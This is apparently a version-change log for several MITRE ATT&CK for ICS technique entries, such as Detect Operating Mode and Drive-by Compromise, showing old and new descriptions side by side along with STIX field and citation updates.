external_references{'source_name': 'Tyson Macaulay', 'description': 'Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ', 'url': 'https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false'}

[T0868] Detect Operating Mode

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may gather information about a PLC’s or controllt1Adversaries may gather information about a PLCs or controlle
>er’s current operating mode. Operating modes dictate what ch>rs current operating mode. Operating modes dictate what chan
>ange or maintenance functions can be manipulated and are oft>ge or maintenance functions can be manipulated and are often
>en controlled by a key switch on the PLC (e.g., run, prog [p> controlled by a key switch on the PLC (e.g.,  run, prog [pr
>rogram], and remote). Knowledge of these states may be valua>ogram], and remote). Knowledge of these states may be valuab
>ble to an adversary to determine if they are able to reprogr>le to an adversary to determine if they are able to reprogra
>am the PLC. Operating modes and the mechanisms by which they>m the PLC. Operating modes and the mechanisms by which they 
> are selected often vary by vendor and product line. Some co>are selected often vary by vendor and product line. Some com
>mmonly implemented operating modes are described below: Prog>monly implemented operating modes are described below:    * 
>ram - This mode must be enabled before changes can be made t>Program - This mode must be enabled before changes can be ma
>o a device’s program. This allows program uploads and downlo>de to a devices program. This allows program uploads and dow
>ads between the device and an engineering workstation. Often>nloads between the device and an engineering workstation. Of
> the PLC’s logic Is halted, and all outputs may be forced of>ten the PLCs logic Is halted, and all outputs may be forced 
>f. Run - Execution of the device’s program occurs in this mo>off. (Citation: N.A. October 2017)   * Run - Execution of th
>de. Input and output (values, points, tags, elements, etc.) >e devices program occurs in this mode. Input and output (val
>are monitored and used according to the program’s logic. Pro>ues, points, tags, elements, etc.) are monitored and used ac
>gram Upload and Program Download are disabled while in this >cording to the programs logic. [Program Upload](https://atta
>mode. Remote - Allows for remote changes to a PLC’s operatio>ck.mitre.org/techniques/T0845) and [Program Download](https:
>n mode. Stop - The PLC and program is stopped, while in this>//attack.mitre.org/techniques/T0843) are disabled while in t
> mode, outputs are forced off. Reset - Conditions on the PLC>his mode. (Citation: Omron) (Citation: Machine Information S
> are reset to their original states. Warm resets may retain >ystems 2007)  (Citation: N.A. October 2017) (Citation: PLCgu
>some memory while cold resets will reset all I/O and data re>rus 2021)    * Remote - Allows for remote changes to a PLCs 
>gisters. Test / Monitor mode - Similar to run mode, I/O is p>operation mode. (Citation: PLCgurus 2021)     * Stop - The P
>rocessed, although this mode allows for monitoring, force se>LC and program is stopped, while in this mode, outputs are f
>t, resets, and more generally tuning or debugging of the sys>orced off. (Citation: Machine Information Systems 2007)    *
>tem. Often monitor mode may be used as a trial for initializ> Reset - Conditions on the PLC are reset to their original s
>ation.>tates. Warm resets may retain some memory while cold resets 
 >will reset all I/O and data registers. (Citation: Machine In
 >formation Systems 2007)    * Test / Monitor mode - Similar t
 >o run mode, I/O is processed, although this mode allows for 
 >monitoring, force set, resets, and more generally tuning or 
 >debugging of the system. Often monitor mode may be used as a
 > trial for initialization. (Citation: Omron)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-05-24 11:48:05.134000+00:00
descriptionAdversaries may gather information about a PLC’s or controller’s current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: Program - This mode must be enabled before changes can be made to a device’s program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLC’s logic Is halted, and all outputs may be forced off. Run - Execution of the device’s program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the program’s logic. Program Upload and Program Download are disabled while in this mode. Remote - Allows for remote changes to a PLC’s operation mode. Stop - The PLC and program is stopped, while in this mode, outputs are forced off. Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization.Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: * Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) * Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) * Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) * Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) * Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) * Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0868https://attack.mitre.org/techniques/T0868
external_references[1]['source_name']ForumAutomation PLC Operating Modes October 2017Machine Information Systems 2007
external_references[1]['description']N.A.. (2017, October). What are the different operating modes in PLC?. Retrieved January 28, 2021.Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28
external_references[1]['url']https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489http://www.machine-information-systems.com/How_PLCs_Work.html
external_references[2]['source_name']Omron PLC Operating ModesN.A. October 2017
external_references[2]['description']Omron. (n.d.). PLC Different Operating Modes. Retrieved January 28, 2021.N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28
external_references[2]['url']https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified.https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489
external_references[3]['source_name']Machine Information Systems PLCs 2007Omron
external_references[3]['description']Machine Information Systems. (2007). How PLCs Work. Retrieved January 28, 2021.Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28
external_references[3]['url']http://www.machine-information-systems.com/How_PLCs_Work.htmlhttps://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified.
external_references[4]['source_name']PLCgurus PLC Basic 2021PLCgurus 2021
external_references[4]['description']PLCgurus. (2021). PLC Basics – Modes Of Operation. Retrieved January 28, 2021.PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28

[T0817] Drive-by Compromise

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may gain access to a system during a drive-by cot1Adversaries may gain access to a system during a drive-by co
>mpromise, when a user visits a website as part of a regular >mpromise, when a user visits a website as part of a regular 
>browsing session.With this technique, the user's web browser>browsing session. With this technique, the user's web browse
> is targeted and exploited simply by visiting the compromise>r is targeted and exploited simply by visiting the compromis
>d website.   The adversary may target a specific community, >ed website.   The adversary may target a specific community,
>such as trusted third party suppliers or other industry spec> such as trusted third party suppliers or other industry spe
>ific groups, which often visit the target website. This kind>cific groups, which often visit the target website. This kin
> of targeted attack relies on a common interest, and is know>d of targeted attack relies on a common interest, and is kno
>n as a strategic web compromise or watering hole attack.   T>wn as a strategic web compromise or watering hole attack.   
>he National Cyber Awareness System (NCAS) has issued a Techn>The National Cyber Awareness System (NCAS) has issued a Tech
>ical Alert (TA) regarding Russian government cyber activity >nical Alert (TA) regarding Russian government cyber activity
>targeting critical infrastructure sectors.   (Citation: Aler> targeting critical infrastructure sectors. (Citation: Cyber
>t - CISA TA18-074A) Analysis by DHS and FBI has noted two di>security & Infrastructure Security Agency March 2018Analys
>stinct categories of victims in the Dragonfly campaign on th>is by DHS and FBI has noted two distinct categories of victi
>e Western energy sector: staging and intended targets. The a>ms in the Dragonfly campaign on the Western energy sector: s
>dversary targeted the less secure networks of staging target>taging and intended targets. The adversary targeted the less
>s, including trusted third-party suppliers and related perip> secure networks of staging targets, including trusted third
>heral organizations. Initial access to the intended targets >-party suppliers and related peripheral organizations. Initi
>used watering hole attacks to target process control, ICS, a>al access to the intended targets used watering hole attacks
>nd critical infrastructure related trade publications and in> to target process control, ICS, and critical infrastructure
>formational websites.> related trade publications and informational websites.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-20 18:27:54.818000+00:00
descriptionAdversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session.With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. The adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. The National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Alert - CISA TA18-074A) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.Adversaries may gain access to a system during a drive-by compromise, when a user visits a website as part of a regular browsing session. With this technique, the user's web browser is targeted and exploited simply by visiting the compromised website. The adversary may target a specific community, such as trusted third party suppliers or other industry specific groups, which often visit the target website. This kind of targeted attack relies on a common interest, and is known as a strategic web compromise or watering hole attack. The National Cyber Awareness System (NCAS) has issued a Technical Alert (TA) regarding Russian government cyber activity targeting critical infrastructure sectors. (Citation: Cybersecurity & Infrastructure Security Agency March 2018) Analysis by DHS and FBI has noted two distinct categories of victims in the Dragonfly campaign on the Western energy sector: staging and intended targets. The adversary targeted the less secure networks of staging targets, including trusted third-party suppliers and related peripheral organizations. Initial access to the intended targets used watering hole attacks to target process control, ICS, and critical infrastructure related trade publications and informational websites.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0817https://attack.mitre.org/techniques/T0817
external_references[1]['source_name']Alert - CISA TA18-074ACybersecurity & Infrastructure Security Agency March 2018
external_references[1]['description']NCAS. (2018, March 15). Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved October 11, 2019.Cybersecurity & Infrastructure Security Agency 2018, March 15 Alert (TA18-074A) Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors Retrieved. 2019/10/11
external_references[1]['url']https://www.us-cert.gov/ncas/alerts/TA18-074Ahttps://us-cert.cisa.gov/ncas/alerts/TA18-074A
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesNetwork Traffic: Network Connection Creation

[T0819] Exploit Public-Facing Application

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may leverage weaknesses to exploit internet-facit1Adversaries may leverage weaknesses to exploit internet-faci
>ng software for initial access into an industrial network. I>ng software for initial access into an industrial network. I
>nternet-facing software may be user applications, underlying>nternet-facing software may be user applications, underlying
> networking implementations, an assets operating system, wea> networking implementations, an assets operating system, wea
>k defenses, etc. Targets of this technique may be intentiona>k defenses, etc. Targets of this technique may be intentiona
>lly exposed for the purpose of remote management and visibil>lly exposed for the purpose of remote management and visibil
>ity. An adversary may seek to target public-facing applicati>ity.  An adversary may seek to target public-facing applicat
>ons as they may provide direct access into an ICS environmen>ions as they may provide direct access into an ICS environme
>t or the ability to move into the ICS network. Publicly expo>nt or the ability to move into the ICS network. Publicly exp
>sed applications may be found through online tools that scan>osed applications may be found through online tools that sca
> the internet for open ports and services. Version numbers f>n the internet for open ports and services. Version numbers 
>or the exposed application may provide adversaries an abilit>for the exposed application may provide adversaries an abili
>y to target specific known vulnerabilities. Exposed control >ty to target specific known vulnerabilities. Exposed control
>protocol or remote access ports found in Commonly Used Port > protocol or remote access ports found in Commonly Used Port
>may be of interest by adversaries.> may be of interest by adversaries.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-19 14:21:18.045000+00:00
descriptionAdversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility. An adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.Adversaries may leverage weaknesses to exploit internet-facing software for initial access into an industrial network. Internet-facing software may be user applications, underlying networking implementations, an assets operating system, weak defenses, etc. Targets of this technique may be intentionally exposed for the purpose of remote management and visibility. An adversary may seek to target public-facing applications as they may provide direct access into an ICS environment or the ability to move into the ICS network. Publicly exposed applications may be found through online tools that scan the internet for open ports and services. Version numbers for the exposed application may provide adversaries an ability to target specific known vulnerabilities. Exposed control protocol or remote access ports found in Commonly Used Port may be of interest by adversaries.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0819https://attack.mitre.org/techniques/T0819
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'ICS CERT 14-281', 'description': 'ICS-CERT. (2014, December 10). ICS Alert (ICS-ALERT-14-281-01E) Ongoing Sophisticated Malware Campaign Compromising ICS (Update E). Retrieved October 11, 2019.', 'url': 'https://www.us-cert.gov/ics/alerts/ICS-ALERT-14-281-01B'}

[T0866] Exploitation of Remote Services

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may exploit a software vulnerability to take advt1Adversaries may exploit a software vulnerability to take adv
>antage of a programming error in a program, service, or with>antage of a programming error in a program, service, or with
>in the operating system software or kernel itself to enable >in the operating system software or kernel itself to enable 
>remote service abuse. A common goal for post-compromise expl>remote service abuse. A common goal for post-compromise expl
>oitation of remote services is for lateral movement to enabl>oitation of remote services is for initial access into and l
>e access to a remote system. (Citation: EAttack Exploitation>ateral movement throughout the ICS environment to enable acc
> of Remote Services)  ICS asset owners and operators have be>ess to targeted systems. (Citation: Enterprise ATT&CK)  ICS 
>en affected by ransomware (or disruptive malware masqueradin>asset owners and operators have been affected by ransomware 
>g as ransomware) migrating from enterprise IT to ICS environ>(or disruptive malware masquerading as ransomware) migrating
>ments: WannaCry, NotPetya, and BadRabbit. In each of these c> from enterprise IT to ICS environments: WannaCry, NotPetya,
>ases, self-propagating (“wormable”) malware initially infect> and BadRabbit. In each of these cases, self-propagating (wo
>ed IT networks, but through exploit (particularly the SMBv1->rmable) malware initially infected IT networks, but through 
>targeting MS17-010 vulnerability) spread to industrial netwo>exploit (particularly the SMBv1-targeting MS17-010 vulnerabi
>rks, producing significant impacts. (Citation: Reference - D>lity) spread to industrial networks, producing significant i
>ragos - 201910)>mpacts. (Citation: Joe Slowik April 2019)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-20 19:23:07.842000+00:00
descriptionAdversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. (Citation: EAttack Exploitation of Remote Services) ICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (“wormable”) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Reference - Dragos - 201910)Adversaries may exploit a software vulnerability to take advantage of a programming error in a program, service, or within the operating system software or kernel itself to enable remote service abuse. A common goal for post-compromise exploitation of remote services is for initial access into and lateral movement throughout the ICS environment to enable access to targeted systems. (Citation: Enterprise ATT&CK) ICS asset owners and operators have been affected by ransomware (or disruptive malware masquerading as ransomware) migrating from enterprise IT to ICS environments: WannaCry, NotPetya, and BadRabbit. In each of these cases, self-propagating (wormable) malware initially infected IT networks, but through exploit (particularly the SMBv1-targeting MS17-010 vulnerability) spread to industrial networks, producing significant impacts. (Citation: Joe Slowik April 2019)
kill_chain_phases[0]['phase_name']lateral-movement-icsinitial-access-ics
kill_chain_phases[1]['phase_name']initial-access-icslateral-movement-ics
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0866https://attack.mitre.org/techniques/T0866
external_references[1]['source_name']EAttack Exploitation of Remote ServicesEnterprise ATT&CK
external_references[1]['description']Enterprise ATT&CK. (n.d.). Exploitation of Remote Services. Retrieved October 27, 2019.Enterprise ATT&CK Exploitation of Remote Services Retrieved. 2019/10/27
external_references[2]['source_name']Reference - Dragos - 201910Joe Slowik April 2019
external_references[2]['description']Joe Slowik. (2019, April 10). Implications of IT Ransomware for ICS Environments. Retrieved October 27, 2019.Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27

[T0822] External Remote Services

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may leverage external remote services as a pointt1Adversaries may leverage external remote services as a point
> of initial access into your network. These services allow u> of initial access into your network. These services allow u
>sers to connect to internal network resources from external >sers to connect to internal network resources from external 
>locations. Examples are VPNs, Citrix, and other access mecha>locations. Examples are VPNs, Citrix, and other access mecha
>nisms. Remote service gateways often manage connections and >nisms. Remote service gateways often manage connections and 
>credential authentication for these services.(Citation: EAtt>credential authentication for these services. (Citation: Dan
>ack External Remote Services) External remote services allow>iel Oakley, Travis Smith, Tripwire)  External remote service
> administration of a control system from outside the system.>s allow administration of a control system from outside the 
> Often, vendors and internal engineering groups have access >system. Often, vendors and internal engineering groups have 
>to external remote services to control system networks via t>access to external remote services to control system network
>he corporate network. In some cases, this access is enabled >s via the corporate network. In some cases, this access is e
>directly from the internet. While remote access enables ease>nabled directly from the internet. While remote access enabl
> of maintenance when a control system is in a remote area, c>es ease of maintenance when a control system is in a remote 
>ompromise of remote access solutions is a liability. The adv>area, compromise of remote access solutions is a liability. 
>ersary may use these services to gain access to and execute >The adversary may use these services to gain access to and e
>attacks against a control system network. Access to valid ac>xecute attacks against a control system network. Access to v
>counts is often a requirement. As they look for an entry poi>alid accounts is often a requirement.   As they look for an 
>nt into the control system network, adversaries may begin se>entry point into the control system network, adversaries may
>arching for existing point‐to‐point VPN implementations at t> begin searching for existing point-to-point VPN implementat
>rusted third party networks or through remote support employ>ions at trusted third party networks or through remote suppo
>ee connections where split tunneling is enabled.(Citation: U>rt employee connections where split tunneling is enabled. (C
>kraine15 - EISAC - 201603) In the Maroochy Attack, the adver>itation: Electricity Information Sharing and Analysis Center
>sary was able to gain remote computer access to the system o>SANS Industrial Control Systems March 2016)  In the Marooc
>ver radio.>hy Shire attack, the adversary gained remote computer access
 > to the system over radio.(Citation: Marshall Abrams July 20
 >08)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-20 18:07:53.764000+00:00
descriptionAdversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services.(Citation: EAttack External Remote Services) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point‐to‐point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled.(Citation: Ukraine15 - EISAC - 201603) In the Maroochy Attack, the adversary was able to gain remote computer access to the system over radio.Adversaries may leverage external remote services as a point of initial access into your network. These services allow users to connect to internal network resources from external locations. Examples are VPNs, Citrix, and other access mechanisms. Remote service gateways often manage connections and credential authentication for these services. (Citation: Daniel Oakley, Travis Smith, Tripwire) External remote services allow administration of a control system from outside the system. Often, vendors and internal engineering groups have access to external remote services to control system networks via the corporate network. In some cases, this access is enabled directly from the internet. While remote access enables ease of maintenance when a control system is in a remote area, compromise of remote access solutions is a liability. The adversary may use these services to gain access to and execute attacks against a control system network. Access to valid accounts is often a requirement. As they look for an entry point into the control system network, adversaries may begin searching for existing point-to-point VPN implementations at trusted third party networks or through remote support employee connections where split tunneling is enabled. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016) In the Maroochy Shire attack, the adversary gained remote computer access to the system over radio.(Citation: Marshall Abrams July 2008)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0822https://attack.mitre.org/techniques/T0822
external_references[1]['source_name']EAttack External Remote ServicesDaniel Oakley, Travis Smith, Tripwire
external_references[1]['description']Daniel Oakley, Travis Smith, Tripwire. (n.d.). Retrieved May 30, 2018.Daniel Oakley, Travis Smith, Tripwire Retrieved. 2018/05/30
external_references[2]['source_name']Ukraine15 - Zetter, KimElectricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016
external_references[2]['description']Zetter, Kim. (2016, March 03). INSIDE THE CUNNING, UNPRECEDENTED HACK OF UKRAINE'S POWER GRID. Retrieved March 8, 2019.Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27
external_references[2]['url']https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf
external_references[3]['source_name']Ukraine15 - ICSCERTMarshall Abrams July 2008
external_references[3]['description']ICS-CERT. (2016, February 25). Cyber-Attack Against Ukrainian Critical Infrastructure. Retrieved March 8, 2019.Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27
external_references[3]['url']https://ics-cert.us-cert.gov/alerts/IR-ALERT-H-16-056-01https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Ukraine15 - Fireeye', 'description': 'John Hultquist. (2016, January 07). Sandworm Team and the Ukrainian Power Authority Attacks. Retrieved March 8, 2019.', 'url': 'https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html'}
external_references{'source_name': 'Ukraine15 - EISAC - 201603', 'description': 'Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems. (2016, March 18). Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case. Retrieved March 27, 2018.', 'url': 'https://ics.sans.org/media/E-ISAC%20SANS%20Ukraine%20DUC%205.pdf'}

[T0872] Indicator Removal on Host

Current version: 1.0

Version changed from: 0.0 → 1.0

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Technique/T0872https://attack.mitre.org/techniques/T0872

[T0883] Internet Accessible Device

Current version: 1.0

Version changed from: 0.0 → 1.0


Old Description
New Description
t1Adversaries may gain access into industrial environments thrt1Adversaries may gain access into industrial environments thr
>ough systems exposed directly to the internet for remote acc>ough systems exposed directly to the internet for remote acc
>ess rather than through External Remote Services. Internet A>ess rather than through [External Remote Services](https://a
>ccessible Devices are exposed to the internet unintentionall>ttack.mitre.org/techniques/T0822). Internet Accessible Devic
>y or intentionally without adequate protections. This may al>es are exposed to the internet unintentionally or intentiona
>low for adversaries to move directly into the control system>lly without adequate protections. This may allow for adversa
> network. Access onto these devices is accomplished without >ries to move directly into the control system network. Acces
>the use of exploits, these would be represented within the E>s onto these devices is accomplished without the use of expl
>xploit Public-Facing Application technique. Adversaries may >oits, these would be represented within the [Exploit Public-
>leverage built in functions for remote access which may not >Facing Application](https://attack.mitre.org/techniques/T081
>be protected or utilize minimal legacy protections that may >9) technique.  Adversaries may leverage built in functions f
>be targeted.(Citation: Bowman Dam - ICS-CERT) In the case of>or remote access which may not be protected or utilize minim
> the Bowman dam incident, adversaries leveraged access to th>al legacy protections that may be targeted. (Citation: NCCIC
>e dam control network through a cellular modem. Access to th> January 2014) These services may be discoverable through th
>e device was protected by password authentication, although >e use of online scanning tools.   In the case of the Bowman 
>the application was vulnerable to brute forcing.(Citation: B>dam incident, adversaries leveraged access to the dam contro
>owman Dam - ICS-CERT)(Citation: Bowman Dam - wall street jou>l network through a cellular modem. Access to the device was
>rnal)(Citation: owman Dam - Times) In Trend Micro’s manufact> protected by password authentication, although the applicat
>uring deception operations adversaries were detected leverag>ion was vulnerable to brute forcing. (Citation: NCCIC Januar
>ing direct internet access to an ICS environment through the>y 2014) (Citation: Danny Yadron December 2015) (Citation: Ma
> exposure of operational protocols such as Siemens S7, Omron>rk Thompson March 2016)  In Trend Micros manufacturing decep
> FINS, and EtherNet/IP, in addition to misconfigured VNC acc>tion operations adversaries were detected leveraging direct 
>ess.(Citation: Trend Micro Honeypot)>internet access to an ICS environment through the exposure o
 >f operational protocols such as Siemens S7, Omron FINS, and 
 >EtherNet/IP, in addition to misconfigured VNC access. (Citat
 >ion: Stephen Hilt, Federico Maggi, Charles Perine, Lord Remo
 >rin, Martin Rsler, and Rainer Vosseler)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['ics-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version1.0
values_changed
STIX FieldOld valueNew Value
modified2021-10-08 15:25:32.143000+00:002022-09-19 14:34:43.060000+00:00
